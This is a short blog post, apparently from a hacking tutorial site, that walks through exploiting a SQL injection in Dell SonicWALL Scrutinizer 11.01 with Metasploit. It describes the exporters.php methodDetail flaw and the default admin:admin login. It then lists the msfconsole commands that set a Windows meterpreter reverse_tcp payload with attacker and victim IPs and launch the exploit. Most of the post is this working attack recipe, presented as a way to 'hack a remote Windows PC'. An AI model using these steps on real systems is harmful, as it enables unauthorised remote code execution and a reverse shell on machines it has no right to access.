This module exploits a vulnerability found in Dell SonicWALL Scrutinizer. The methodDetail parameter in exporters.php allows an attacker to write arbitrary files to the file system with an SQL Injection attack, and gain remote code execution under the context of SYSTEM for Windows, or as Apache for Linux. Authentication is required to exploit this vulnerability, but this module uses the default admin:admin credential.
Exploit Targets
Dell SonicWALL Scrutinizer 11.01
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli
msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set payload windows/meterpreter/reverse_tcp
msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set lhost 192.168.0.108 (IP of Local Host)
msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set rhost 192.168.0.120
msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>exploit
The post Hack Remote Windows PC using Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection appeared first on Hacking Articles.